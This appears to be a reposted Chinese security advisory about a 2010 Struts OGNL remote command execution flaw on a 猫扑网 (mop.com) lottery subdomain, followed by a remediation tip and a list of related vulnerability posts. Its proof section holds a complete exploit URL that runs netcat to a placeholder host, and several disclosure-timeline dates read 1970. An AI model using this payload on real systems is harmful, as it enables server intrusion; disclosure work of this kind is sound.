猫扑网存在远程命令执行漏洞

最新推荐文章于 2025-08-22 07:45:59 发布
原创 最新推荐文章于 2025-08-22 07:45:59 发布 · 140 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全 #hack #安全 #漏洞

这篇博客详细记录了一起针对猫扑网的远程命令执行漏洞,该漏洞发生在2010年,经过一系列的披露过程,最终在8月18日公开细节。漏洞利用了Struts框架的缺陷,可能导致服务器被入侵。修复方案建议通过限制ParameterInterceptor的excludeParams白名单来防止恶意字符串输入。

漏洞详情

披露状态:

2010-07-16: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商已经确认,细节仅向厂商公开
1970-01-11: 细节向核心白帽子及相关领域专家公开
1970-01-21: 细节向普通白帽子公开
1970-01-31: 细节向实习白帽子公开
2010-08-18: 细节向公众公开

简要描述:

猫扑网可以远程命令执行,可能造成网站服务器被入侵.

详细说明:

还是Struts,这个跑的好像是一套现成的系统吧.

漏洞证明:

http://caipiao.sports.mop.com/sp1/act/chartmall.chart.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exec%28%22/usr/bin/nc%20ip port%22%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1

修复方案:

使用ParameterInterceptor中的excludeParams白名单参数限制允许使用的字符串,比如"A-z0-9_.'"[]",像\()@需要禁止.

Sword-heart
关注
Hoverfly 任意文件读取漏洞 (CVE-2024-45388)
iSee857的博客
09-09 855
Hoverfly是一个为开发人员和测试人员提供的轻量级服务虚拟化/API模拟/API模拟工具。在/api/v2/simulation接口存在任意文件读取漏洞,攻击者可以通过使用`../`段来逃离基本路径,从而访问任何任意文件。
[渗透测试] 任意文件读取漏洞
Da1NtY的博客
06-25 1539
使用filepath传递,在filepath中输入地址来获取文件内容。​ php.ini配置文件中,限定文件访问范围。不能有文件包含漏洞,目录遍历漏洞或者其他漏洞。使用str_replace进行替换。让用户只能访问一定的路径。
漏洞检查项)| 任意文件读取漏洞 file-read
Da1NtY的博客
06-25 505
存在文件读取的地方,通过修改文件路径来读取敏感文件、
任意文件读取漏洞
m0_57276420的博客
04-08 6659
任意文件读取漏洞(Arbitrary File Read Vulnerability)是指攻击者可以通过web应用程序读取任意文件而不受访问控制限制的漏洞。这种漏洞可能导致敏感信息泄露、系统崩溃等问题。攻击者可以利用任意文件读取漏洞访问服务器上的任意文件,包括密码文件、配置文件等,从而获取系统权限和敏感信息。此外,攻击者还可以利用该漏洞读取应用程序中的敏感数据,如数据库凭据、API密钥等。任意文件读取漏洞通常是由于未正确验证用户输入所导致的。
mop猫扑网分页特效代码
03-20
【标题】"mop猫扑网分页特效代码"涉及到的是网页开发中的一个特定功能,即在网站上实现美观且互动性强的分页效果。猫扑网作为一个知名的网络社区,其分页特效可能是为了提高用户体验,使用户在浏览大量内容时能够更...
猫扑网络进销存综合管理系统.doc
05-19
猫扑网络进销存综合管理系统是一款集成了采购管理、销售管理、库存管理等业务流程的软件解决方案。该系统旨在通过信息化手段提升企业物流、信息流和资金流的管理效率,从而帮助企业实现精细化管理和运营成本的降低。...
猫扑网网络营销案例分析.doc
06-25
猫扑网网络营销案例分析.doc
猫扑网爱听专用嗅探下载器V4.0:修复BUG优化体验
提供下载的文件名称为“猫扑网爱听专用嗅探下载器 V4.0.exe”,这是一个可执行文件,说明用户下载后无需安装,直接运行即可。这表明该软件是以压缩包的形式分发,方便用户下载、存储和传播。 8. 下载器的版权与合法...
猫扑网络进销存管理系统功能全面升级
### 猫扑网络进销存综合管理系统概述 #### 开发环境与版本 - **.NET Framework版本**:net2005,表明该系统是基于.NET Framework 2.0版本进行开发的。 - **数据库管理系统**:SQL Server 2000,表示系统后端数据库...
Web漏洞-任意文件读取漏洞
Ays.Ie的博客
03-13 3130
该篇记录了Web漏洞-任意文件读取漏洞
Vite 任意文件读取漏洞(CVE-2025-31486)
最新发布
m0_47398713的博客
08-22 165
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。
任意文件读取/下载漏洞
qq_68163788的博客
05-23 4524
任意文件读取/下载漏洞是一种常见的网络安全漏洞,攻击者利用该漏洞可以访问和下载服务器上的任意文件,包括敏感信息、配置文件、数据库文件等。这种漏洞通常由于程序员在编写代码时未正确过滤用户输入导致,攻击者可以通过在输入中插入特定的路径遍历字符(如../)来尝试访问系统上的其他文件。 攻击者利用任意文件读取/下载漏洞可以获取系统重要信息,如用户凭证、敏感数据等,进而造成严重的安全威胁。攻击者可以利用这些信息进行进一步的攻击,或者将其用于勒索、欺诈等恶意活动。
浅谈跨网站脚本攻击(XSS)的手段与防范(简析新浪微博XSS攻击事件)
tansitongba
01-13 618
本文主要涉及内容: 什么是XSS XSS攻击手段和目的 XSS的防范 新浪微博攻击事件 什么是XSS 跨网站脚本(Cross-sitescripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常...
【MetInfo任意文件读取】--任意文件读取漏洞
m0_63241485的博客
08-29 4401
任意文件读取漏洞分析
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值